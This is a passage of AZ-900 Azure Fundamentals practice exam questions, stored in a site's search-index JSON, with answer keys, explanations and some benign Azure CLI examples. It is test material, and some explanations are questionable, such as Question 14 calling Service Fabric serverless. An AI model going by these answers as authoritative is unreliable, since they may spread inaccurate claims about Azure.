                            What can be applied to a resource to prevent accidental deletion?

                            • a resource lock

                            A resource lock prevents resources from being accidentally deleted or changed. Resource tags offer the custom grouping of resources. Policies enforce different rules across all resource configurations so that the configurations stay compliant with corporate standards. An initiative is a way of grouping related policies together. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn
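                            A minimal Azure CLI sketch (the lock and group names are assumptions):

                            ```
                            # CanNotDelete still allows reads and updates but blocks deletion
                            az lock create --name do-not-delete --lock-type CanNotDelete --resource-group rg-demo
                            ```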

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-of-50","title":"Question 38 of 50","text":"

                            You need to recommend a solution for Azure virtual machine deployments. The solution must enforce company standards on the virtual machines. What should you include in the recommendation?

                            • Azure Blueprints. This answer is incorrect.

                            • Azure Policy. This answer is correct.

                            Azure policies will allow you to enforce company standards on new virtual machines when combined with Azure VM Image Builder and Azure Compute Gallery. By using Azure Policy and role-based access control (RBAC) assignments, enterprises can enforce standards on Azure resources. But on virtual machines, these mechanisms only affect the control plane or the route to the virtual machine. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-of-50","title":"Question 39 of 50","text":"

                            You need to ensure that multi-factor authentication (MFA) is enabled on accounts with write permissions in an Azure subscription. What should you implement?

                            • Azure Policy

                            Azure Policy is a service in Azure that enables you to create, assign, and manage policies that control or audit resources. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-of-50","title":"Question 40 of 50","text":"

                            What can you use to restrict the deployment of a virtual machine to a specific location?

                            • Azure Policy

                            Azure Policy can help to create a policy for allowed regions, which enables you to restrict the deployment of virtual machines to a specific location. Overview of Azure Policy - Azure Policy | Microsoft Learn. Describe the purpose of Azure Policy - Training | Microsoft Learn
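                            A hedged Azure CLI sketch assigning the built-in \"Allowed locations\" policy at resource-group scope (the scope and names are assumptions; the definition is looked up by display name instead of hard-coding its GUID):

                            ```
                            # Find the built-in "Allowed locations" policy definition
                            def_id=$(az policy definition list --query "[?displayName=='Allowed locations'].name" -o tsv)

                            # Restrict deployments in the resource group to East US
                            az policy assignment create --name allowed-locations --policy "$def_id" --resource-group rg-demo --params '{"listOfAllowedLocations":{"value":["eastus"]}}'
                            ```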

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-of-50","title":"Question 41 of 50","text":"

                            Which management layer accepts requests from any Azure tool or API and enables you to create, update, and delete resources in an Azure account?

                            • Azure Resource Manager (ARM)

                            ARM is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in an Azure account. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-of-50","title":"Question 42 of 50","text":"

                            What can you use to manage servers across cloud platforms and on-premises environments?

                            • Azure Arc

                            Azure Arc simplifies governance and management by delivering a consistent multi-cloud and on-premises management platform. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn. Describe the purpose of Azure Arc - Training | Microsoft Learn.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-of-50","title":"Question 43 of 50","text":"

                            What provides recommendations to reduce the cost of Azure resources?

                            • Azure Advisor

                            Azure Advisor analyzes the account usage and makes recommendations based on its set and configured rules. Describe monitoring tools in Azure - Training | Microsoft Learn
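                            The same recommendations can also be pulled programmatically; a minimal Azure CLI sketch:

                            ```
                            # List Advisor cost recommendations for the current subscription
                            az advisor recommendation list --category Cost -o table
                            ```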

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-of-50","title":"Question 44 of 50","text":"

                            You have a team of Linux administrators that need to manage the resources in Azure. The team wants to use the Bash shell to perform the administration. What should you recommend?

                            • Azure CLI

                            Azure CLI allows you to use the Bash shell to perform administrative tasks. Bash is used in Linux environments, so a Linux administrator will probably be more comfortable performing command-line administration from Azure CLI. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn
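                            Azure CLI composes naturally with standard Bash tooling; a small illustrative sketch:

                            ```
                            #!/usr/bin/env bash
                            # Print every VM's name and current power state
                            az vm list -d --query "[].{name:name, state:powerState}" -o tsv |
                            while read -r name state; do
                                echo "$name is $state"
                            done
                            ```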

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-of-50","title":"Question 45 of 50","text":"

                            You need to create a custom solution that uses thresholds to trigger autoscaling functionality to scale an app up or down to meet user demand. What should you include in the solution?

                            • Application insights. This answer is incorrect.

                            • Azure Monitor. This answer is correct.

                            Azure Monitor is a platform that collects metric and logging data, such as CPU percentages. The data can be used to trigger autoscaling. Describe monitoring tools in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-of-50","title":"Question 46 of 50","text":"

                            What should you proactively review and act on to avoid service interruptions, such as service retirements and breaking changes?

                            • Azure Monitor. This answer is incorrect.

                            • health advisories. This answer is correct.

                            Health advisories are issues that require that you take proactive action to avoid service interruptions, such as service retirements and breaking changes. Service issues are problems such as outages that require immediate actions. Describe monitoring tools in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-of-50","title":"Question 47 of 50","text":"

                            What can you use to get notification about an outage in a specific Azure region?

                            • Azure Service Health

                            Service Health notifies you of Azure-related service issues, such as region-wide downtime. Describe monitoring tools in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-of-50","title":"Question 48 of 50","text":"

                            Which Azure service can generate an alert if virtual machine utilization is over 80% for five minutes?

                            • Azure Monitor

                            Azure Monitor is a platform for collecting, analyzing, visualizing, and alerting based on metrics. Azure Monitor can log data from an entire Azure and on-premises environment. Describe monitoring tools in Azure - Training | Microsoft Learn
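                            A hedged Azure CLI sketch of such an alert rule (the scope, names, and resource group are placeholders):

                            ```
                            # Fire when average CPU over a 5-minute window exceeds 80%
                            az monitor metrics alert create --name cpu-over-80 --resource-group rg-demo --scopes "/subscriptions/<subscription-id>/resourceGroups/rg-demo/providers/Microsoft.Compute/virtualMachines/vm1" --condition "avg Percentage CPU > 80" --window-size 5m --evaluation-frequency 1m
                            ```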

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-of-50","title":"Question 49 of 50","text":"

                            What can you apply to an Azure virtual machine to ensure that users cannot change or delete the resource?

                            • a lock

                            Protect your Azure resources with a lock - Azure Resource Manager | Microsoft Learn. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-of-50","title":"Question 50 of 50","text":"

                            Which feature in the Microsoft Purview governance portal should you use to manage access to data sources and datasets?

                            • Data Estate Insights. This answer is incorrect.
                            • Data Policy. This answer is correct.

                            Incorrect: Data Catalog \u2013\u2013 This enables data discovery. Incorrect: Data Sharing \u2013\u2013 This shares data within and between organizations. Incorrect: Data Estate Insights \u2013\u2013 This assesses data estate health. Correct: Data Policy \u2013\u2013 This governs access to data.

                            Introduction to Microsoft Purview governance solutions - Microsoft Purview | Microsoft Learn. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#exams-from-course-az-900-microsoft-azure-fundamentals-original-practice-tests","title":"Exams from \"Course AZ-900: Microsoft Azure Fundamentals Original Practice Tests\"","text":"

                            Exams from the Udemy course AZ-900: Microsoft Azure Fundamentals Original Practice Tests.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-1","title":"Test 1","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-which-azure-feature-is-specifically-designed-to-help-companies-get-their-in-house-developed-code-from-the-code-repository-through-automated-unit-testing-and-onto-azure-using-a-service-called-pipelines","title":"Question 1:\u00a0Which Azure feature is specifically designed to help companies get their in-house developed code from the code repository, through automated unit testing, and onto Azure using a service called Pipelines?","text":"
                            • Azure Monitor
                            • GitHub
                            • Azure DevOps
                            • Virtual Machines

                            Explanation: Azure DevOps contains many services, one of which is Pipelines. Pipelines allows you to build an automation that moves code (and all related dependencies) through various stages from the development environment into deployment.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-true-or-false-there-are-no-service-level-guarantees-sla-when-a-service-is-in-general-availability-ga","title":"Question 2: True or false: there are no service level guarantees (SLA) when a service is in General Availability (GA)","text":"
                            • FALSE
                            • TRUE

                            Explanation: False, most Azure GA services do have service level agreements. See:\u00a0https://azure.microsoft.com/en-ca/support/legal/sla/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-which-ways-does-the-azure-resource-manager-model-provide-to-deploy-resources","title":"Question 3:\u00a0Which ways does the Azure Resource Manager model provide to deploy resources?","text":"
                            • CLI
                            • Powershell
                            • Azure Portal
                            • REST API / SDK

                            Explanation: Azure Resource Manager (ARM) is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in your Azure account. The ARM model allows you to work with resources in a consistent manner, whether through Azure portal, PowerShell, REST APIs/SDKs, or the Command-Line Interface (CLI).

                            1. Azure Portal: This is a web-based, unified console that provides an alternative to command-line tools. You can manage your Azure resources directly through a GUI.

                            2. PowerShell: Azure PowerShell is a module that provides cmdlets to manage Azure through Windows PowerShell and PowerShell Core. You can use it to build scripts for managing and automating your Azure resources.

                            3. REST API / SDK: Azure provides comprehensive REST APIs that can be used directly or via Azure SDKs available in multiple languages. This allows developers to integrate Azure services in their applications, services, or tools.

                            4. CLI: Azure CLI is a cross-platform command-line program that connects to Azure and executes administrative commands on Azure resources. It's designed to make scripting easy, authenticate with the Azure platform, and quickly run commands to perform common administrative tasks or deploy to Azure.

                            Each of these methods supports the full set of Azure Resource Manager features, and you can choose the one that best fits your workflow. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview
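                            For instance, the same ARM template can be deployed from the CLI; a minimal sketch (the group, template file, and parameter names are illustrative):

                            ```
                            # Deploy an ARM template into a resource group with Azure CLI
                            az deployment group create --resource-group rg-demo --template-file azuredeploy.json --parameters environment=dev
                            ```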

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-type-of-container-is-used-to-collect-log-and-metric-data-from-various-azure-resources","title":"Question 4: What type of container is used to collect log and metric data from various Azure Resources?","text":"
                            • Log Analytics Workspace
                            • Managed Storage
                            • Append Blob Storage
                            • Azure Monitor account

                            Explanation: Log Analytics Workspace is required to collect logs and metrics. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/platform/manage-access
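                            A minimal Azure CLI sketch creating such a workspace (names are illustrative):

                            ```
                            # Create the workspace that log and metric data is collected into
                            az monitor log-analytics workspace create --resource-group rg-demo --workspace-name law-demo --location eastus
                            ```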

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-which-azure-service-is-meant-to-be-a-security-dashboard-that-contains-all-the-security-and-threat-protection-in-one-place","title":"Question 5:\u00a0Which Azure service is meant to be a security dashboard that contains all the security and threat protection in one place?","text":"
                            • Azure Portal Dashboard
                            • Azure Security Center
                            • Azure Key Vault
                            • Azure Monitor

                            Explanation: Azure Security Center - unified security management and threat protection; a security dashboard inside Azure Portal. See:\u00a0https://azure.microsoft.com/en-us/services/security-center/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-what-is-a-ddos-attack","title":"Question 6: What is a DDoS attack?","text":"
                            • A denial of service attack that sends so much traffic to a network that it cannot respond fast enough; legitimate users become unable to use the service
                            • An attempt to read the contents of a web page from another website, thereby stealing the user's private information
                            • An attempt to send SQL commands to the server in a way that it will execute them against the database
                            • An attempt to guess a user's password through brute force methods

                            Explanation: Distributed Denial of Service attacks (DDoS) -a type of attack that originates from the Internet that attempts to overwhelm a network with millions of packets of bad traffic that aims to prevent legitimate traffic from getting through. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-in-the-context-of-cloud-computing-and-azure-services-how-would-you-define-compute-resources","title":"Question 7:\u00a0In the context of cloud computing and Azure services, how would you define 'compute resources'?","text":"
                            • They include all resources listed in the Azure Marketplace.
                            • They are resources that execute tasks requiring CPU cycles.
                            • They refer exclusively to Virtual Machines.
                            • They encompass Virtual Machines, Storage Accounts, and Virtual Networks.

                            Explanation: The correct answer is \"They are resources that execute tasks requiring CPU cycles\". In cloud computing, the term \"compute\" refers to the amount of computational power required to process a task - essentially, it's anything that uses processing power (CPU cycles) to perform operations. This includes, but is not limited to, running applications, executing scripts, and processing data. While virtual machines (VMs) are a common type of compute resource, they are not the only type. Azure offers a wide variety of compute resources, like Azure Functions for serverless computing, Azure Kubernetes Service for container-based applications, and Azure Batch for parallel and high-performance computing tasks. So, the definition of compute resources is broader than just VMs or certain resources listed in the Azure Marketplace. It also includes more than VMs, Storage Accounts, and Virtual Networks, as these other resources (storage and networking) have distinct roles separate from the compute resources. Storage accounts deal with data storage while virtual networks are concerned with networking aspects in Azure, not with performing tasks that require CPU cycles. Therefore, \"They are resources that execute tasks requiring CPU cycles\" is the most accurate answer. See:\u00a0https://azure.microsoft.com/en-us/product-categories/compute/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-which-azure-service-contains-pre-built-machine-learning-models-that-you-can-use-in-your-own-code-using-an-api","title":"Question 8:\u00a0Which\u00a0Azure Service contains pre-built machine learning models that you can use in your own code, using an API?","text":"
                            • Cognitive Services
                            • Azure Functions
                            • Azure Blueprints
                            • App Services

                            Explanation: Cognitive Services is a set of APIs that Azure provides, giving access to pre-built machine learning models including vision services, speech services, knowledge management, and chat bots.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-in-microsoft-azure-what-is-the-maximum-number-of-virtual-machines-that-can-be-included-in-a-single-virtual-machine-scale-set-as-per-azures-standard-guidelines-and-capabilities","title":"Question 9: In Microsoft Azure, what is the maximum number of virtual machines that can be included in a single Virtual Machine Scale Set, as per Azure's standard guidelines and capabilities?","text":"
                            • 10000
                            • 1000
                            • Unlimited
                            • 500

                            Explanation: The correct answer is 1000. Azure Virtual Machine Scale Sets are a service provided by Azure that allows you to manage, scale, and distribute large numbers of identical virtual machines. As per the limitations set by Microsoft Azure, a single Virtual Machine Scale Set can support up to 1000 VM instances. This capacity allows for high availability and network load balancing across a large number of virtual machines, providing a robust and efficient solution for applications that require heavy compute resources. However, if you are using custom VM images, this limit decreases to 600 instances. This functionality is part of Azure's Infrastructure as a Service (IaaS) offerings, providing flexibility and scalability to businesses and developers. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/overview
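
                            As a rough sketch with the Azure CLI (the resource names and image alias below are placeholders, not values from this question), the instance count is set explicitly at creation time and must stay within the limits described above:

                            ```bash
                            # Create a scale set with 5 instances (limit: 1000 for platform
                            # images, 600 for custom images); names/image are placeholders
                            az vmss create \
                              --resource-group my-rg \
                              --name my-scale-set \
                              --image Ubuntu2204 \
                              --instance-count 5 \
                              --admin-username azureuser \
                              --generate-ssh-keys
                            ```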

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-what-feature-within-azure-will-make-recommendations-to-you-about-reducing-cost-on-your-account","title":"Question 10:\u00a0What feature within Azure will make recommendations to you about reducing cost on your account?","text":"
                            • Azure Service Health
                            • Azure Security Center
                            • Azure Advisor
                            • Azure Dashboard

                            Explanation: Azure Advisor analyzes your account usage and makes recommendations for you based on its set rules. See:\u00a0https://docs.microsoft.com/en-us/azure/advisor/advisor-overview
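
                            As a quick illustrative sketch, the same recommendations can also be pulled with the Azure CLI:

                            ```bash
                            # List Advisor cost-reduction recommendations for the current subscription
                            az advisor recommendation list --category Cost --output table
                            ```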

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-your-organization-has-implemented-an-azure-policy-that-restricts-the-type-of-virtual-machine-instances-you-can-use-how-can-you-create-a-vm-that-is-blocked-by-the-policy","title":"Question 11: Your organization has implemented an Azure Policy that restricts the type of Virtual Machine instances you can use. How can you create a VM that is blocked by the policy?","text":"
                            • Use an account that has Contributor or above permissions to the resource group
                            • Subscription Owners (Administrators) can create resources regardless of what the policy restricts
                            • The only way is to remove the policy, create the resource and add the policy back

                            Explanation: Azure Policy applies to everyone, including subscription owners: you cannot perform a task that violates a policy, so you have to remove the policy, perform the task, and then add the policy back. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-you-have-decided-to-subscribe-to-azure-ddos-protection-at-the-ip-protection-tier-this-provides-advanced-protection-to-defend-against-ddos-attacks-what-type-of-ddos-attack-does-ddos-protection-not-protect-against","title":"Question 12:\u00a0You have decided to subscribe to Azure DDoS\u00a0Protection at the IP Protection Tier. This provides advanced protection to defend against DDoS attacks. What type of DDoS attack does DDoS Protection NOT\u00a0protect against?","text":"
                            • Transport (L4)\u00a0level attacks
                            • Application (L7) level attacks
                            • Network (L3)\u00a0level attacks

                            Explanation: The correct answer is \"Application level attacks\":

                            • Network-level attacks\u00a0are attacks that target the network infrastructure, such as the routers and switches that connect your Azure resources to the internet. Azure DDoS Protection IP Protection Tier can protect against network-level attacks by absorbing and rerouting excessive traffic, and by scrubbing malicious traffic.

                            • Transport-level attacks\u00a0are attacks that target the transport layer of the network protocol stack, such as TCP and UDP. Azure DDoS Protection IP Protection Tier can protect against transport-level attacks by absorbing and rerouting excessive traffic, and by scrubbing malicious traffic.

                            • Application-level attacks\u00a0are attacks that target the application layer of the network protocol stack, such as HTTP and DNS. Azure DDoS Protection IP Protection Tier\u00a0does not\u00a0protect against application-level attacks, because it is designed to protect against network and transport-level attacks.

                            To protect against application-level attacks, you need to use a web application firewall (WAF). A WAF is a software appliance that sits in front of your application and filters out malicious traffic. WAFs can be configured to protect against a wide variety of application-level attacks, such as SQL injection, cross-site scripting, and denial of service attacks. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-characteristics-of-a-cloud-based-system-primarily-contributes-to-its-elasticity","title":"Question 13: Which of the following characteristics of a cloud-based system primarily contributes to its elasticity?","text":"
                            • The system's ability to recover automatically after a crash.
                            • The system's ability to dynamically increase and decrease capacity based on real-time demand.
                            • The system's ability to maintain availability while updates are being implemented.
                            • The system's ability to withstand denial-of-service attacks.

                            Explanation: The correct answer is \"The ability to increase and reduce capacity based on actual demand.\" This characteristic refers to the concept of\u00a0elasticity\u00a0in cloud computing. An elastic system\u00a0is one that can automatically adjust its resources\u00a0(compute, storage, etc.) in response to changing workloads and demands. This is done to ensure optimal performance and cost-effectiveness. When demand increases, the system can scale out by adding more resources, and when demand decreases, it can scale in by reducing resources, all without significant manual intervention. The other options, while important for overall system robustness, do not define elasticity. Withstanding denial of service attacks pertains to security, maintaining availability during updates refers to zero-downtime deployment or high availability, and self-healing after a crash refers to resilience or fault tolerance. None of these are about dynamically adjusting capacity based on demand, which is the hallmark of an elastic system. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-elastic-computing/

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-logic-apps-functions-and-service-fabric-are-all-examples-of-what-model-of-compute-within-azure","title":"Question 14:\u00a0Logic apps, functions, and service fabric are all examples of what model of compute within Azure?","text":"
                            • SaaS model
                            • App Services Model
                            • IaaS model
                            • Serverless model

                            Explanation: The correct answer is the Serverless model. Azure Logic Apps, Azure Functions, and Azure Service Fabric are all examples of serverless computing in Azure. Serverless computing is a cloud computing model where the cloud provider automatically manages the provisioning and allocation of servers, hence the term \"serverless\". The serverless model allows developers to focus on writing the code and business logic rather than worrying about the underlying infrastructure, its setup, maintenance, scaling, and capacity planning.

                            • Azure Logic Apps is a cloud service that allows developers to build workflows that integrate apps, data, services, and systems.
                            • Azure Functions is an event-driven, compute-on-demand experience that extends the existing Azure application platform with capabilities to implement code triggered by events occurring in Azure or third-party services.
                            • Azure Service Fabric is a distributed systems platform that makes it easy to package, deploy, and manage scalable and reliable microservices.

                            In contrast, IaaS (Infrastructure as a Service) refers to cloud-based services where you rent IT infrastructure\u2014servers and virtual machines (VMs), storage, networks, and operating systems\u2014from a cloud provider on a pay-as-you-go basis. SaaS (Software as a Service) is a software distribution model in which a third-party provider hosts applications and makes them available to customers over the Internet, which doesn't align with the services mentioned in the question. The App Services model is a platform for hosting web applications, REST APIs, and mobile backends, but it's not strictly serverless as it doesn't auto-scale in the same way. See:\u00a0https://azure.microsoft.com/en-us/solutions/serverless/
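
                            As a minimal sketch of the serverless model in practice (names, region, and runtime are placeholders), a Function App on the pay-per-execution Consumption plan needs only a backing storage account:

                            ```bash
                            # Storage account backing the Function App (name must be globally unique)
                            az storage account create --name myfuncstore12345 --resource-group my-rg \
                              --location westeurope --sku Standard_LRS

                            # Function App on the serverless Consumption plan
                            az functionapp create \
                              --resource-group my-rg \
                              --name my-func-app \
                              --storage-account myfuncstore12345 \
                              --consumption-plan-location westeurope \
                              --runtime python \
                              --os-type Linux \
                              --functions-version 4
                            ```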

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-what-is-a-primary-benefit-of-opting-for-a-consumption-based-pricing-model-over-a-time-based-pricing-model-in-cloud-services","title":"Question 15: What is a primary benefit of opting for a consumption-based pricing model over a time-based pricing model in cloud services?","text":"
                            • The ability to easily predict the future cost of the service.
                            • It always being cheaper to pay for consumption rather than paying hourly.
                            • Significant cost savings when the resources aren't needed for constant use.
                            • A simpler and easier-to-understand pricing model.

                            Explanation: The correct answer is \"Significant cost savings when the resources aren't needed for constant use\". In a consumption-based pricing model, also known as pay-as-you-go, customers are billed only for the specific resources they use. This model provides cost-efficiency for workloads with variable usage patterns or for resources that aren't needed continuously.

                            When compared to a time-based pricing model, where resources are billed on a fixed schedule regardless of actual use (for example, hourly or monthly), consumption-based pricing can result in significant cost savings if the resources are not used often or their usage fluctuates.

                            While the other options can be true in certain cases, they aren't inherently beneficial aspects of the consumption-based model. The cost predictability can be challenging due to the variable nature of usage (Answer 1), it's not always cheaper (Answer 2) as it depends on the resource usage pattern, and the simplicity of the pricing model (Answer 4) depends on the specific terms and conditions of the service provider. Therefore, the most accurate and generalizable benefit is the potential for cost savings with infrequent or variable resource use. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/functions-consumption-costs

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-in-microsoft-azure-which-tool-or-service-allows-for-the-organization-and-management-of-multiple-subscriptions-within-hierarchical-structures","title":"Question 16: In Microsoft Azure, which tool or service allows for the organization and management of multiple subscriptions within hierarchical structures?","text":"
                            • RBAC (Role-Based Access Control)
                            • Management Groups
                            • Azure Active Directory
                            • Resource Groups

                            Explanation: The correct answer is\u00a0Management Groups. In Azure, Management Groups provide a way to manage access, policies, and compliance for multiple subscriptions. They can be structured into a hierarchy for the organization's needs. All subscriptions within a Management Group automatically inherit the conditions applied to the Management Group, facilitating governance on a large scale.

                            Resource Groups, on the other hand, are containers for resources deployed on Azure. They do not provide management capabilities across multiple subscriptions.

                            RBAC (Role-Based Access Control)\u00a0is a system that provides fine-grained access management to Azure resources but it doesn't inherently support the organization of subscriptions into hierarchies.

                            Azure Active Directory\u00a0is a service that provides identity and access management capabilities but does not provide a direct mechanism for managing multiple subscriptions in nested hierarchies.

                            Hence, Management Groups is the correct answer as it directly allows for the management and organization of multiple subscriptions into nested hierarchies, which the other options do not. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/management-groups/overview
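
                            A brief sketch with the Azure CLI (the group name and subscription ID are placeholders); subscriptions placed under the group inherit its policies and access assignments:

                            ```bash
                            # Create a management group and move a subscription under it
                            az account management-group create --name corp-root
                            az account management-group subscription add \
                              --name corp-root \
                              --subscription "00000000-0000-0000-0000-000000000000"
                            ```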

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-which-feature-of-azure-active-directory-will-require-users-to-have-their-mobile-phone-in-order-to-be-able-to-log-in","title":"Question 17:\u00a0Which feature of Azure Active Directory will require users to have their mobile phone in order to be able to log in?","text":"
                            • Azure Security Center
                            • Multi-Factor Authentication
                            • Azure Information Protection (AIP)
                            • Advanced Threat Protection (ATP)

                            Explanation: Multi-Factor Authentication (MFA) - the concept of requiring something in addition to a password in order to log in. Passwords can be found or guessed, but having your mobile phone on you to receive a phone call or text, or to run an app that generates a code, is much harder for an unknown attacker to obtain. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-who-is-responsible-for-the-security-of-the-physical-servers-in-an-azure-data-center","title":"Question 18: Who is responsible for the security of the physical servers in an Azure data center?","text":"
                            • Azure is responsible for securing the physical data centers
                            • I am responsible for securing the physical data centers

                            Explanation: Azure is responsible for physical security. See:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/physical-security

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-true-or-false-azure-is-a-public-cloud-and-has-no-private-cloud-offerings","title":"Question 19:\u00a0True or False: Azure is a public cloud, and has no private cloud offerings","text":"
                            • TRUE
                            • FALSE

                            Explanation: The correct answer is FALSE. While Azure is indeed widely recognized as a public cloud provider, offering a vast array of services accessible via the internet on a multi-tenant basis, it does also provide private cloud capabilities. One notable offering is Azure Stack, an extension of Azure that allows businesses to run apps in an on-premises environment and deliver Azure services in their datacenter. With Azure Stack, you get the flexibility of using Azure\u2019s cloud capabilities while maintaining your own datacenter for privacy, regulatory compliance, or other requirements. Additionally, Azure offers services such as Azure Private Link, which provides private connectivity from a virtual network to Azure services, and Azure ExpressRoute, a service that enables a private, dedicated network connection to Azure. So, contrary to the statement, Azure does have private cloud offerings along with its public cloud, making the statement FALSE. See:\u00a0

                            • https://azure.microsoft.com/en-us/overview/what-is-a-private-cloud/
                            • https://azure.microsoft.com/en-us/global-infrastructure/government/
                            • https://azure.microsoft.com/en-us/overview/azure-stack/
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-who-is-responsible-for-the-security-of-your-azure-storage-account-access-keys","title":"Question 20:\u00a0Who is responsible for the security of your Azure Storage account access keys?","text":"
                            • Azure is responsible for securing the access keys
                            • I am responsible for securing the access keys

                            Explanation: Customers are responsible for securing the access keys they are given and for regenerating them if they are exposed. See:\u00a0https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage
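
                            For example (account and resource group names are placeholders), an exposed key can be rotated from the Azure CLI; any client still using the old key must then be updated:

                            ```bash
                            # Inspect the current access keys
                            az storage account keys list --account-name mystorage --resource-group my-rg

                            # Regenerate key1 after it has been exposed
                            az storage account keys renew --account-name mystorage \
                              --resource-group my-rg --key key1
                            ```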

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-which-feature-within-azure-collects-all-of-the-logs-from-various-resources-into-a-central-dashboard-where-you-can-run-queries-view-graphs-and-create-alerts-on-certain-events","title":"Question 21:\u00a0Which feature within Azure collects all of the logs from various resources into a central dashboard, where you can run queries, view graphs, and create alerts on certain events?","text":"
                            • Azure Portal Dashboard
                            • Azure Monitor
                            • Azure Security Center
                            • Storage Account or Event Hub

                            Explanation: Azure Monitor - a centralized dashboard that collects all the logs, metrics and events from your resources. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/overview
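
                            As an illustrative sketch (the workspace GUID and the Kusto query are placeholders), logs collected into a Log Analytics workspace can be queried from the CLI as well as from the dashboard:

                            ```bash
                            # Run a Kusto query against a Log Analytics workspace (customer ID GUID)
                            az monitor log-analytics query \
                              --workspace "00000000-0000-0000-0000-000000000000" \
                              --analytics-query "AzureActivity | summarize count() by OperationNameValue | top 5 by count_"
                            ```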

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-when-establishing-a-site-to-site-vpn-connection-with-azure-what-kind-of-network-device-needs-to-be-present-or-installed-in-your-companys-on-premises-network-infrastructure","title":"Question 22: When establishing a Site-to-Site VPN connection with Azure, what kind of network device needs to be present or installed in your company's on-premises network infrastructure?","text":"
                            • An Azure Virtual Network
                            • An Application Gateway
                            • A dedicated virtual machine
                            • A compatible VPN Gateway device

